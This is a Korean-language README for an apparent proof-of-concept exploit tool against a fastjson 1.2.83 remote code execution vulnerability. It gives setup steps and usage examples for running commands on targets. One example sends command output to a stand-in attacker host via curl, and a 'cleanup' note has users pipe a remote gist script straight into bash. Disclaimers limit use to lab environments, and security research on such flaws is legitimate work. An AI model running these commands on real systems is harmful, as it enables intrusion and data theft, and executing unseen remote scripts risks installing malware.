
UpdatedAug 2, 2026
CVE-2026-16723 — Updated!
CVE-2026-16723
CVE-2026-16723
후원
PayPal 또는 아래 QR 코드를 스캔하여 이 프로젝트의 유지 관리를 후원해 주세요.
⚡ 간단한 사용법
이 프로젝트는 다음과 같은 안전하고 승인된 환경에서만 사용하세요.
- 로컬 가상 머신
- Docker 컨테이너
- 격리된 실습 환경
- 승인된 침투 테스트 환경
설정 예시:
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723
# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
사용 예시:
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse
# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"
# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000
# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure
# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080
# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50
# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet
참고:
- 다른 프로젝트에서 복제한 경우 중첩된
.git디렉터리를 정리하려면curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y를 실행해야 합니다. - 예: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...
출처 또는 참고 자료
- https://fearsoff.org/research/fastjson-1-2-83-rce
- https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
- https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch
📚 교육용 보안 연구 저장소
통제된 환경에서 사이버 보안 개념을 학습, 테스트, 연구하기 위한 저장소입니다.
⚠️ 보안 및 법적 고지
목적
이 저장소는 교육 및 승인된 보안 연구 목적으로만 사용됩니다.
사용자가 다음을 학습하도록 돕기 위해 설계되었습니다:
- 보안 취약점
- 샌드박스 및 격리 개념
- 안전한 코딩 및 방어적 보안 실무
승인된 용도로만 사용
권한이 있는 환경에서만 이 저장소를 사용하세요. 예:
- 개인 실습 환경 또는 가상 머신
- Docker 또는 격리된 환경
- 승인된 침투 테스트
- 사이버 보안 교육 또는 학술 연구
승인되지 않았거나 불법적인 사용은 엄격히 금지됩니다.
면책 조항
저자와 기여자는 이 프로젝트로 인해 발생하는 손해, 오용, 법적 문제 또는 손실에 대해 책임을 지지 않습니다.
이 저장소를 사용함으로써 다음에 동의하게 됩니다:
- 본인의 행동에 대한 책임은 본인에게 있습니다
- 법적·윤리적으로 사용할 것입니다
- 프로젝트는 보증 없이 제공됩니다
윤리적 사용
이 프로젝트는 다음을 위해 만들어졌습니다:
- 방어적 보안 연구
- 사이버 보안 교육
- 취약점 인식 제고
- 안전한 시스템 및 소프트웨어 연구
책임 있는 공개 관행을 따르고 적용 가능한 모든 법률을 준수해 주세요.
연락처
책임 있는 공개 또는 협업을 위해 GitHub를 통해 저장소 관리자에게 연락하세요.
